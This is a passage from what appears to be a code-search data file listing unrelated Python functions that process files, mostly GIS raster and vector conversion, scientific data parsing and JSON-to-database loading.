dataset creation options\n kwargs = compression.config(**filter_opts).dataset_compression_kwargs()\n kwargs['shape'] = dims\n kwargs['dtype'] = rds.dtypes[0]\n\n dataset = fid.create_dataset(dataset_name, **kwargs)\n attach_image_attributes(dataset, attrs)\n\n # tiled processing (all cols by chunked rows)\n ytile = filter_opts['chunks'][1] if rds.count == 3 else filter_opts['chunks'][0]\n tiles = generate_tiles(rds.width, rds.height, rds.width, ytile)\n\n for tile in tiles:\n # numpy index\n if rds.count == 3:\n idx = (\n slice(None),\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n else:\n idx = (\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n\n # ensure single band rds is read as 2D not 3D\n data = rds.read(window=tile) if rds.count == 3 else rds.read(1, window=tile)\n\n # write\n dataset[idx] = data", "def create_user_functions():\n\n # user_function.lgi useing PARAM_A and PARAM_B for 
slope and intercept\n lagrit_input = \"\"\"\ncmo/DELATT/mo_pts/dfield\ncompute / distance_field / mo_pts / mo_line_work / dfield\nmath/multiply/mo_pts/x_four/1,0,0/mo_pts/dfield/PARAM_A/\nmath/add/mo_pts/x_four/1,0,0/mo_pts/x_four/PARAM_B/\ncmo/copyatt/mo_pts/mo_pts/fac_n/x_four\nfinish\n\"\"\"\n f = open('user_function.lgi', 'w')\n f.write(lagrit_input)\n f.close()\n\n # user_function2.lgi uses PARAM_A2 and PARAM_B2 for slope and intercept\n lagrit_input = \"\"\"\ncmo/DELATT/mo_pts/dfield\ncompute / distance_field / mo_pts / mo_line_work / dfield\nmath/multiply/mo_pts/x_four/1,0,0/mo_pts/dfield/PARAM_A2/\nmath/add/mo_pts/x_four/1,0,0/mo_pts/x_four/PARAM_B2/\ncmo/copyatt/mo_pts/mo_pts/fac_n/x_four\nfinish\n\"\"\"\n f = open('user_function2.lgi', 'w')\n f.write(lagrit_input)\n f.close()", "def __call__(self, format, filename):\n # turn the filename into something suitable for use in #define's\n prettyname = filename.replace(\".\", \"_\").upper()\n prettyname = prettyname.replace(\"/\", \"__\")\n prettyname = prettyname.replace(\":\", \"__\")\n prettyname = prettyname.replace(\"-\", \"__\")\n\n # try and open the file\n with open(filename, \"w\") as output:\n self.writeFuncsLut[format]( output, prettyname )", "def analyze(file,process):\n readin(file)\n # inspecting(file, functions)\n process(file, functions)", "def compute_functions(file_name,E_max,E_min,gamma,gamma_k):\n\n file = open(file_name,'r')\n data = file.readlines()\n file.close()\n\n print \"Computing functions\"\n all_lor = []\n for fila in data[2:]:\n vals = map(eval,fila.split())\n if(len(vals)>1):\n if(vals[1]>E_min and vals[1] < E_max):\n ek = vals[1]\n weight = 0\n for j in range(2,len(vals)):\n weight += vals[j]\n A = get_func(vals[0],vals[1],weight,gamma,gamma_k)\n all_lor.append(A)\n\n return all_lor", "def process_function(regexDict: typing.Dict[str, str], fileContent: str, flags: int = re.IGNORECASE) -> str:\n\t\tfor pattern, replace in sorted(regexDict.items()):\n\t\t\tfileContent = re.sub(pattern, replace, fileContent, flags=flags)\n\t\treturn fileContent", "def make_vrt(self):\n for index, i in enumerate(self.months):\n month = str(index + 1)\n if len(month) < 2:\n month = '0' + month\n txt_file = i.joinpath('subnational/tiffs.txt')\n outfile = i.joinpath(f'{self.country}_{month}_normalised.vrt')\n if not outfile.exists():\n gdal_cmd = f'gdalbuildvrt -input_file_list {str(txt_file)} {str(outfile)}'\n subprocess.call(gdal_cmd, shell=True)", "def cli(source_f, raster_f, output, verbose):\n with fiona.open(source_f, 'r') as source:\n source_driver = source.driver\n source_crs = source.crs\n sink_schema = source.schema.copy()\n\n source_geom = source.schema['geometry']\n if source_geom == 'Point':\n sink_schema['geometry'] = '3D Point'\n elif source_geom == 'LineString':\n sink_schema['geometry'] = '3D LineString'\n elif source_geom == '3D Point' or source_geom == '3D LineString':\n pass\n else:\n click.BadParameter(\"Source geometry type {} not implemented\".format(source_geom))\n\n with rasterio.open(raster_f) as raster:\n if source_crs != raster.crs:\n click.BadParameter(\"Features and raster have different CRS.\")\n if raster.count > 1:\n warnings.warn(\"Found {0} bands in {1}, expected a single band raster\".format(raster.bands, raster_f))\n supported = ['int16', 'int32', 'float32', 'float64']\n if raster.dtypes[0] not in supported:\n warnings.warn(\"Found {0} type in {1}, expected one of {2}\".format(raster.dtypes[0], raster_f, supported))\n with fiona.open(\n output, 'w',\n driver=source_driver,\n 
crs=source_crs,\n schema=sink_schema) as sink:\n\n for feature in source:\n try:\n feature_z = drapery.drape(raster, feature)\n sink.write({\n 'geometry': mapping(feature_z),\n 'properties': feature['properties'],\n })\n except Exception:\n logging.exception(\"Error processing feature %s:\", feature['id'])\n #print(sink.closed)\n #print(raster.closed)\n #print(source.closed)", "def process_data(*args, **kwargs):\n\n filepath = kwargs[\"filepath\"]\n func = kwargs[\"func\"]\n \n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(datafile)\n print('{}/{} files processed.'.format(i, num_files))", "def parse_flt_files(files=[], info=None, uniquename=False, use_visit=False,\n get_footprint = False, \n translate = {'AEGIS-':'aegis-', \n 'COSMOS-':'cosmos-', \n 'GNGRISM':'goodsn-', \n 'GOODS-SOUTH-':'goodss-', \n 'UDS-':'uds-'}): \n \n if info is None:\n if not files:\n files=glob.glob('*flt.fits')\n \n if len(files) == 0:\n return False\n \n info = get_flt_info(files)\n else:\n info = info.copy()\n \n for c in info.colnames:\n if not c.islower(): \n info.rename_column(c, c.lower())\n\n if 'expstart' not in info.colnames:\n info['expstart'] = info['exptime']*0.\n\n so = np.argsort(info['expstart'])\n info = info[so]\n\n #pa_v3 = np.round(info['pa_v3']*10)/10 % 360.\n pa_v3 = np.round(info['pa_v3']) % 360.\n \n target_list = []\n for i in range(len(info)):\n #### Replace ANY targets with JRhRmRs-DdDmDs\n if info['targname'][i] == 'ANY': \n if use_visit:\n new_targname=info['file'][i][:6]\n else:\n new_targname = 'par-'+radec_to_targname(ra=info['ra_targ'][i],\n dec=info['dec_targ'][i])\n \n target_list.append(new_targname.lower())\n else:\n target_list.append(info['targname'][i])\n \n target_list = np.array(target_list)\n\n info['progIDs'] = [file[1:4] for file in info['file']]\n\n progIDs = np.unique(info['progIDs'])\n visits = np.array([os.path.basename(file)[4:6] for file in info['file']])\n dates = np.array([''.join(date.split('-')[1:]) for date in info['date-obs']])\n \n targets = np.unique(target_list)\n \n output_list = [] #OrderedDict()\n filter_list = OrderedDict()\n \n for filter in np.unique(info['filter']):\n filter_list[filter] = OrderedDict()\n \n angles = np.unique(pa_v3[(info['filter'] == filter)]) \n for angle in angles:\n filter_list[filter][angle] = []\n \n for target in targets:\n #### 3D-HST targname translations\n target_use = target\n for key in translate.keys():\n target_use = target_use.replace(key, translate[key])\n \n ## pad i < 10 with zero\n for key in translate.keys():\n if translate[key] in target_use:\n spl = target_use.split('-')\n try:\n if (int(spl[-1]) < 10) & (len(spl[-1]) == 1):\n spl[-1] = '{0:02d}'.format(int(spl[-1]))\n target_use = '-'.join(spl)\n except:\n pass\n\n for filter in np.unique(info['filter'][(target_list == target)]):\n angles = np.unique(pa_v3[(info['filter'] == filter) & \n (target_list == target)])\n \n for angle in angles:\n exposure_list = []\n exposure_start = []\n product='{0}-{1:05.1f}-{2}'.format(target_use, angle, filter) \n\n visit_match = np.unique(visits[(target_list == target) &\n (info['filter'] == filter)])\n \n this_progs = []\n this_visits = []\n 
\n for visit in visit_match:\n ix = (visits == visit) & (target_list == target) & (info['filter'] == filter)\n #this_progs.append(info['progIDs'][ix][0])\n #print visit, ix.sum(), np.unique(info['progIDs'][ix])\n new_progs = list(np.unique(info['progIDs'][ix]))\n this_visits.extend([visit]*len(new_progs))\n this_progs.extend(new_progs)\n \n for visit, prog in zip(this_visits, this_progs):\n visit_list = []\n visit_start = []\n visit_product = '{0}-{1}-{2}-{3:05.1f}-{4}'.format(target_use, prog, visit, angle, filter) \n \n use = ((target_list == target) & \n (info['filter'] == filter) & \n (visits == visit) & (pa_v3 == angle) &\n (info['progIDs'] == prog))\n \n if use.sum() == 0:\n continue\n\n for tstart, file in zip(info['expstart'][use],\n info['file'][use]):\n \n f = file.split('.gz')[0]\n if f not in exposure_list:\n visit_list.append(str(f))\n visit_start.append(tstart)\n \n exposure_list = np.append(exposure_list, visit_list)\n exposure_start.extend(visit_start)\n \n filter_list[filter][angle].extend(visit_list)\n \n if uniquename:\n print(visit_product, len(visit_list))\n so = np.argsort(visit_start)\n exposure_list = np.array(visit_list)[so]\n #output_list[visit_product.lower()] = visit_list\n \n d = OrderedDict(product=str(visit_product.lower()),\n files=list(np.array(visit_list)[so]))\n output_list.append(d)\n \n if not uniquename:\n print(product, len(exposure_list))\n so = np.argsort(exposure_start)\n exposure_list = np.array(exposure_list)[so]\n #output_list[product.lower()] = exposure_list\n d = OrderedDict(product=str(product.lower()),\n files=list(np.array(exposure_list)[so]))\n output_list.append(d)\n \n ### Get visit footprint from FLT WCS\n if get_footprint:\n from shapely.geometry import Polygon\n \n N = len(output_list)\n for i in range(N):\n for j in range(len(output_list[i]['files'])):\n flt_file = output_list[i]['files'][j]\n if (not os.path.exists(flt_file)) & os.path.exists('../RAW/'+flt_file):\n flt_file = '../RAW/'+flt_file\n \n flt_j = pyfits.open(flt_file)\n h = flt_j[0].header\n if (h['INSTRUME'] == 'WFC3') & (h['DETECTOR'] == 'IR'):\n wcs_j = pywcs.WCS(flt_j['SCI',1])\n else:\n wcs_j = pywcs.WCS(flt_j['SCI',1], fobj=flt_j)\n \n fp_j = Polygon(wcs_j.calc_footprint())\n if j == 0:\n fp_i = fp_j\n else:\n fp_i = fp_i.union(fp_j)\n \n output_list[i]['footprint'] = fp_i\n \n return output_list, filter_list", "def load_from_function(function, path_to_file, **kwargs):\n return function(path_to_file, **kwargs)", "def apply(input, output, fields, delimiter, encoding, verbose, format_in, zipfile, script, filter):\n if verbose:\n enableVerbose()\n options = {}\n options['delimiter'] = delimiter\n options['fields'] = fields\n options['output'] = output\n options['encoding'] = encoding\n options['format_in'] = format_in\n options['zipfile'] = zipfile\n options['filter'] = filter\n options['script'] = script\n acmd = Transformer()\n acmd.script(input, options)\n pass", "def write_func(functions, filename=def_func_name):\n file = open(filename + \".txt\", \"w\")\n for i in range(3):\n line = str(functions[i])\n file.write(line+'\\n')\n file.close()", "def translate_files(input_file, output_file, translate_dict, delete_symbols):\n\n for line in input_file:\n result = translate(line, translate_dict, delete_symbols)\n output_file.write(result)", "def process_input_files(inputs):\n for ifile in inputs:\n with open(ifile) as fin:\n exec(compile(fin.read(), ifile, 'exec'))", "def add_pixel_fn(filename: str, resample_name: str) -> None:\n\n header = \"\"\" <VRTRasterBand 
dataType=\"Byte\" band=\"1\" subClass=\"VRTDerivedRasterBand\">\"\"\"\n contents = \"\"\"\n <PixelFunctionType>{0}</PixelFunctionType>\n <PixelFunctionLanguage>Python</PixelFunctionLanguage>\n <PixelFunctionCode><![CDATA[{1}]]>\n </PixelFunctionCode>\"\"\"\n\n lines = open(filename, 'r').readlines()\n lines[3] = header # FIX ME: 3 is a hand constant\n lines.insert(4, contents.format(resample_name,\n get_resample(resample_name)))\n open(filename, 'w').write(\"\".join(lines))", "def HandleFiles(variables):\n\n # The template file is the html file into which we will write the\n # data from the stats file, formatted correctly for the gviz_api.\n template_file = open(variables[1], \"r\")\n page_template = template_file.read()\n template_file.close()\n\n # This is the path match pattern for finding stats files amongst\n # all the other files it could be. eg: *.stt\n file_pattern = variables[2]\n\n # This is the directory with files that we will use to do the comparison\n # against.\n baseline_dir = variables[3]\n snrs = ''\n filestable = {}\n filestable['dsnr'] = ''\n filestable['drate'] = ''\n filestable['avg'] = ''\n\n # Go through each metric in the list.\n for column in range(1,2):\n\n # Dirs is directories after the baseline to compare to the base.\n dirs = variables[4:len(variables)]\n\n # Find the metric files in the baseline directory.\n dir_list = sorted(fnmatch.filter(os.listdir(baseline_dir), file_pattern))\n\n for metric in ['avg','dsnr','drate']:\n description = {\"file\": (\"string\", \"File\")}\n\n # Go through each directory and add a column header to our description.\n countoverall = {}\n sumoverall = {}\n\n for directory in dirs:\n description[directory] = (\"number\", directory)\n countoverall[directory] = 0\n sumoverall[directory] = 0\n\n # Data holds the data for the visualization, name given comes from\n # gviz_api sample code.\n data = []\n for filename in dir_list:\n row = {'file': splitext(basename(filename))[0] }\n baseline_file_name = baseline_dir + \"/\" + filename\n\n # Read the metric file from each of the directories in our list.\n for directory in dirs:\n metric_file_name = directory + \"/\" + filename\n\n # If there is a metric file in the current directory, open it\n # and calculate its overall difference between it and the baseline\n # directory's metric file.\n if os.path.isfile(metric_file_name):\n overall = FileBetter(baseline_file_name, metric_file_name,\n column, metric)\n row[directory] = overall\n\n sumoverall[directory] += overall\n countoverall[directory] += 1\n\n data.append(row)\n\n # Add the overall numbers.\n row = {\"file\": \"OVERALL\" }\n if countoverall[directory]:\n for directory in dirs:\n row[directory] = sumoverall[directory] / countoverall[directory]\n data.append(row)\n\n # write the tables out\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n\n filestable[metric] = ( filestable[metric] + \"filestable_\" + metric +\n \"[\" + str(column) + \"]=\" + data_table.ToJSon()\n + \"\\n\" )\n\n filestable_avg = filestable['avg']\n filestable_dpsnr = filestable['dsnr']\n filestable_drate = filestable['drate']\n\n # Now we collect all the data for all the graphs. 
First the column\n # headers which will be Datarate and then each directory.\n columns = (\"datarate\",baseline_dir)\n description = {\"datarate\":(\"number\", \"Datarate\")}\n for directory in dirs:\n description[directory] = (\"number\", directory)\n\n description[baseline_dir] = (\"number\", baseline_dir)\n\n snrs = snrs + \"snrs[\" + str(column) + \"] = [\"\n\n # Now collect the data for the graphs, file by file.\n for filename in dir_list:\n\n data = []\n\n # Collect the file in each directory and store all of its metrics\n # in the associated gviz metrics table.\n all_dirs = dirs + [baseline_dir]\n for directory in all_dirs:\n\n metric_file_name = directory + \"/\" + filename\n if not os.path.isfile(metric_file_name):\n continue\n\n # Read and parse the metrics file storing it to the data we'll\n # use for the gviz_api.Datatable.\n metrics = ParseMetricFile(metric_file_name, column)\n for bitrate, metric in metrics:\n data.append({\"datarate\": bitrate, directory: metric})\n\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n snrs = snrs + \"'\" + data_table.ToJSon(\n columns_order=tuple([\"datarate\",baseline_dir]+dirs)) + \"',\"\n\n snrs = snrs + \"]\\n\"\n\n formatters = \"\"\n for i in range(len(dirs)):\n formatters = \"%s formatter.format(better, %d);\" % (formatters, i+1)\n\n print FillForm(page_template, vars())\n return", "def run(fn, *input_values, **kwds):\n \n ee = kwds.get('ee', shared_exec_engine)\n input_types = [arg.type for arg in fn.args]\n gv_inputs = [gv_from_python(x, t) \n for (x,t) in \n zip(input_values, input_types)]\n \n return run_with_generic_values(fn, gv_inputs, ee)", "def parsedFile(self, *args, **kwargs):\n\t\tif not self._parsed:\n\t\t\tself.parse()\n\n\t\treturn function(self, *args, **kwargs)", "def filter_f(fns, ltaper, lowerp, upperp, utaper, eqband, eqltaper, equtaper, npow, bindir):\n # filtercmd = bindir+\"/filter4\"\n filtercmd = bindir + \"/filter4 1>/dev/null\"\n for src, tar, eqtar in fns:\n p = sp.Popen(filtercmd, shell=True, bufsize=0, stdin=sp.PIPE, stdout=None)\n child = p.stdin\n print >> child, ltaper, lowerp, upperp, utaper, npow, src, tar + '_tmp'\n err = child.close()\n ret = p.wait()\n if err or ret != 0:\n raise RuntimeError, '%r failed with exit code %d' % (filtercmd, err)\n p = sp.Popen(filtercmd, shell=True, bufsize=0, stdin=sp.PIPE, stdout=None)\n child = p.stdin\n print >> child, eqltaper, eqband[0], eqband[1], equtaper, npow, tar + '_tmp', eqtar + '_tmp'\n err = child.close()\n ret = p.wait()\n if err or ret != 0:\n raise RuntimeError, '%r failed with exit code %d' % (filtercmd, err)\n return 1", "def io_files(self, iterable, ext=None, func=None):\n for input_path in iterable:\n output_path, temp_file = self.check_output_path(input_path, ext)\n\n try:\n func(input_path, temp_file)\n except Exception as e:\n if self._force_continue is True:\n self.handle_error(e, input_path)\n else:\n raise e\n\n self.overwrite_output_path(input_path, output_path, temp_file)", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n 
transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def render_functions(r2, covered_bbs, output_dir):\n for func_addr in function_addrs(r2):\n # Get the function name\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n # XXX This is very hacky - need something more robust\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n # Node name is not a hex string\n continue\n\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name, func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)", "def file_func(self,):\n return self._file_func", "def process_data(db_cursor, filepath, func):\n\n # Get all files matching extension from directory\n all_files = []\n for root, _, files in os.walk(filepath):\n files = glob.glob(os.path.join(root, '*.json'))\n for f in files:\n all_files.append(os.path.abspath(f))\n\n num_files = len(all_files)\n print(f'{num_files} files found in {filepath}')\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(db_cursor, datafile)\n print(f'{i}/{num_files} files processed.')", "def gen_code(self, filename, func_name):\n\n assert self.bits is not None\n\n vd_list = []\n n_vars = 0\n for tree in self.trees:\n vd_list.append(tree.gen_code(n_vars))\n n_vars += len(vd_list[-1])\n\n # checks the type by the suffix\n\n is_v = filename.split(\".\")[-1] == \"v\"\n\n assert self.inputs\n\n f = open(filename, \"w\")\n\n i_bits = np.sum(self.bits[:-1])\n o_bits = self.bits[-1]\n o_sign = self.is_neg[-1]\n\n if is_v:\n f.write(\"module {}(input [{}:0] i, output [{}:0] o);\\n\".format(\n func_name, i_bits-1, o_bits-1))\n else:\n f.write(\"#include<ac_int.h>\\n\\n\")\n f.write(\"void {}(ac_int<{},false> i, ac_int<{},{}> &o)\\n\".format(\n func_name, i_bits, o_bits, o_sign))\n f.write(\"{\\n\")\n\n\n # write function headline\n s_in_line = []\n\n i_bits = self.bits[0]\n i_sign = self.is_neg[0]\n\n if is_v:\n i_datatype = \" wire {}[{}:0] \".format(\n \"signed \" if i_sign else \"\", i_bits-1)\n else:\n i_datatype = \" ac_int<{},{}> \".format(i_bits, i_sign)\n\n len_s = len(i_datatype)\n\n for i in range(self.inputs):\n if is_v:\n s = (\n \"i_\" + str(i) + \" = \" + \"i[\" + str(i_bits*(i+1)-1) + \":\" +\n str(i_bits*i) + \"]\"\n )\n else:\n s = (\n \"i_\" + str(i) + \" = \" + \"i.slc<\" + str(i_bits) + \">(\" +\n str(i_bits*i) + \")\"\n )\n if (\n len_s + len(s) + 2 > 70 or i_bits != self.bits[i] or\n i_sign != self.is_neg[i]\n ):\n f.write(i_datatype + \", \".join(s_in_line) + \";\\n\")\n\n 
s_in_line = []\n if is_v:\n i_datatype = \" wire {}[{}:0] \".format(\n \"signed \" if i_sign else \"\", i_bits-1)\n else:\n i_datatype = \" ac_int<{},{}> \".format(i_bits, i_sign)\n\n len_s = len(i_datatype)\n\n s_in_line.append(s)\n len_s += len(s) + 2\n\n if s_in_line:\n f.write(i_datatype + \", \".join(s_in_line) + \";\\n\")\n\n if is_v:\n o_datatype = \" wire {}[{}:0] \".format(\n \"signed \" if o_sign else \"\", o_bits)\n else:\n o_datatype = \" ac_int<{},{}> \".format(o_bits, o_sign)\n\n o_list = []\n for i in range(len(vd_list)):\n for v in vd_list[i]:\n if is_v:\n f.write(o_datatype + v + \" = \" + vd_list[i][v] + \";\\n\")\n else:\n f.write(o_datatype + v + \" = \" + vd_list[i][v] + \";\\n\")\n f.write(\"\\n\")\n o_list.append(v)\n\n assert len(o_list) <= 3\n\n if is_v:\n f.write(\" assign \")\n else:\n f.write(\" \")\n\n if len(o_list) == 1:\n f.write(\"o = \" + o_list[0] + \";\")\n elif len(o_list) == 2:\n cond = \"( \" + o_list[0] + \" == \" + o_list[1] + \" ) \"\n n1 = o_list[0]\n n0 = \"( ( \" + \" + \".join(o_list) + \" ) >> 1 )\"\n f.write(\"o = \" + cond + \"? \" + n1 + \": \" + n0)\n elif len(o_list) == 3:\n cond = (\n \"( \" +\n \"( \" + \" == \".join(o_list[0:2]) + \" )?\" + o_list[0] + \":\" +\n \"( \" + \" == \".join(o_list[1:]) + \" )?\" + o_list[1] + \":\" +\n \"( \" + \" == \".join([o_list[0], o_list[2]]) + \" )?\" + o_list[0] +\n \":\" + \"( \" + \" < \".join(o_list[0:2]) + \" ) ?\" +\n \"( ( \" + \" < \".join(o_list[1:]) + \" ) ?\" + o_list[1] + \":\" +\n o_list[2] + \" ) : \" +\n \"( ( \" + \" < \".join([o_list[0], o_list[2]]) + \" ) ?\" + o_list[0] +\n \":\" + o_list[2] + \" )\"\n )\n f.write(\"o = \" + cond + \";\\n\")\n if is_v:\n f.write(\"endmodule\")\n else:\n f.write(\"}\")\n\n f.close()", "def convert(threshold, infile, tmpfile_1, tmpfile_2, outfile):\n args = [\n \"gdal_calc.py\",\n '-A', infile,\n '--outfile={}'.format(tmpfile_1),\n '--calc=logical_and(A>={}, A<999)'.format(threshold),\n '--type=Byte', '--NoDataValue=0',\n '--co=SPARSE_OK=YES',\n '--co=NBITS=1',\n '--quiet'\n # Could enable compression\n # --co=\"COMPRESS=LZW\"\n ]\n subprocess.run(args)\n\n subprocess.run([\n \"gdal_polygonize.py\",\n tmpfile_1,\n '-q',\n '-f', 'ESRI Shapefile',\n tmpfile_2\n ])\n\n subprocess.run([\n \"ogr2ogr\",\n '-a_srs', 'EPSG:4326',\n outfile,\n tmpfile_2\n ])\n\n subprocess.run([\"rm\", tmpfile_1])\n subprocess.run([\"rm\", tmpfile_2])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'shx')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'dbf')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'prj')])", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n # print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # TODO - make the default configurable.\n# if src.crs == None:\n# src.crs = CRS.from_epsg(4326)\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n # print(type(vrt))\n # save the file as an enumerated tiff. 
reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def process_data(cursor, connection, filepath, function):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root, '*.json'))\n for f in files:\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n function(cursor, datafile)\n connection.commit()\n print('{}/{} files processed.'.format(i, num_files))", "def postprocess_cga(lines, outfile):\n pattern = re.compile(\"^\\s*([0-9,]+)\\s+\\([ 0-9.]+%\\)\\s+Source/(\\S+):(\\S+)\\(.*\\).*$\")\n\n totalCost = 0.0\n functionTable = []\n functionMap = {}\n\n for line in lines:\n line = line.strip()\n match = pattern.match(line)\n if not match:\n continue\n\n cost = float(match.group(1).replace(\",\", \"\"))\n sourceFile = match.group(2)\n function = match.group(3)\n\n # Filter out library code we don't want to change\n if function.startswith(\"stbi__\"):\n continue\n\n totalCost += cost\n\n # Accumulate the scores from functions in multiple call chains\n if function in functionMap:\n index = functionMap[function]\n functionTable[index][1] += cost\n functionTable[index][2] += cost\n # Else add new functions to the end of the table\n else:\n functionMap[function] = len(functionTable)\n functionTable.append([function, cost, cost])\n\n # Sort the table by accumulated cost\n functionTable.sort(key=lambda x: 101.0 - x[2])\n\n for function in functionTable:\n function[2] /= totalCost\n function[2] *= 100.0\n\n with open(outfile, \"w\") as fileHandle:\n\n totals = 0.0\n for function in functionTable:\n # Omit entries less than 1% load\n if function[2] < 1:\n break\n\n totals += function[2]\n fileHandle.write(\"%5.2f%% %s\\n\" % (function[2], function[0]))\n\n fileHandle.write(\"======\\n\")\n fileHandle.write(f\"{totals:5.2f}%\\n\")", "def run(self, verbose=False):\n from utils import write_to_file # function to write json to file\n self.read_json()\n graph = self.parse_jsons()\n json = self.pipe_vl2vg(graph)\n return self.write_to_file(rawinput=json, filetype='json', output_path=self.output_path, engine_name=self.engine_name, algorithm_name=self.algorithm_name, suffix=self.file_suffix, verbose=verbose)", "def CallF_DirFile(dir_path,function,file_filter_=None,regular=False,**kw):\n file_list = Get_dir_file_list(dir_path=dir_path,file_filter_=file_filter_,regular=regular,distinguish=True)\n file_list = file_list[0]\n save_list = []\n for file_name in file_list:\n file_path = os.path.join(dir_path,file_name)\n save_list.append(function(file_path=file_path,**kw))\n return save_list", "def py_SurfStatAvSurf(filenames, fun = np.add, output_surfstat=False):\n \n if filenames.ndim is not 2:\n raise ValueError('Filenames must be a 2-dimensional array.')\n \n for i in range(0, 
filenames.shape[0]):\n surfaces = np.empty(filenames.shape[1], dtype=np.object)\n for j in range(0, filenames.shape[1]):\n \n # Check whether input is BSPolyData or a filename. \n if isinstance(filenames[i,j], BSPolyData):\n surfaces[j] = filenames[i,j] \n else:\n surfaces[j] = read_surface(filenames[i,j])\n \n # Concatenate second dimension of filenames. \n if j is 0:\n tri = get_cells(surfaces[j]) \n coord = get_points(surfaces[j])\n else:\n tri = np.concatenate((tri, get_cells(surfaces[j]) + coord.shape[0]), axis=0)\n coord = np.concatenate((coord, get_points(surfaces[j])), axis=0)\n \n if i is 0:\n m = 1\n coord_all = coord\n else:\n coord_all = fun(coord_all,coord)\n m = fun(m,1)\n \n coord_all = coord_all / m \n \n if output_surfstat:\n surface = {'tri': np.array(tri) + 1, 'coord': np.array(coord_all).T}\n else:\n surface = build_polydata(coord_all, tri)\n \n return surface", "def vjp_assemble_eval(\n fenics_function: Callable, fenics_templates: FenicsVariable, *args: np.array\n) -> Tuple[np.array, Callable]:\n\n numpy_output, ufl_form, fenics_inputs = assemble_eval(\n fenics_function, fenics_templates, *args\n )\n\n def vjp_fun(g):\n return tuple(\n vjp if vjp is not None else jax.ad_util.zeros_like_jaxval(args[i])\n for i, vjp in enumerate(vjp_assemble_impl(g, ufl_form, fenics_inputs))\n )\n\n return numpy_output, vjp_fun", "def InterpolateFunctions(self, , p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=...):\n ...", "def process(self,fileobj_out,fileobj_in):\n pass", "def run_functions( functions, dir ):\n res = []\n for i in range(0, len(functions)):\n res.append(functions[i].execute(dir))\n return summarize_as_html(res)", "def bind(self, func: Callable[[Any], IO]) -> IO:\n\n filename, g = self._value\n return ReadFile(filename, lambda s: g(s).bind(func))", "def read_func(filename=def_func_name, index=def_index):\n file = open(filename+str(index)+\".txt\", \"r\")\n functions = []\n for i in range(3):\n line = file.readline()\n line = line.replace('\\'', '').strip()\n functions.append(parse_line(line))\n return functions", "def transform(infile, output, insrs, format_name):\n\n logging.info('Transforming %s from %s to %s' % (infile, insrs, output)) \n in_srs = osr.SpatialReference()\n in_srs.ImportFromEPSG(insrs)\n out_srs = osr.SpatialReference()\n out_srs.ImportFromEPSG(4324)\n coordTrans = osr.CoordinateTransformation(in_srs, out_srs)\n\n in_dsn = ogr.Open(infile)\n in_layer = in_dsn.GetLayer()\n in_feature_definition = in_layer.GetLayerDefn()\n\n out_driver = ogr.GetDriverByName(format_name)\n out_dsn = 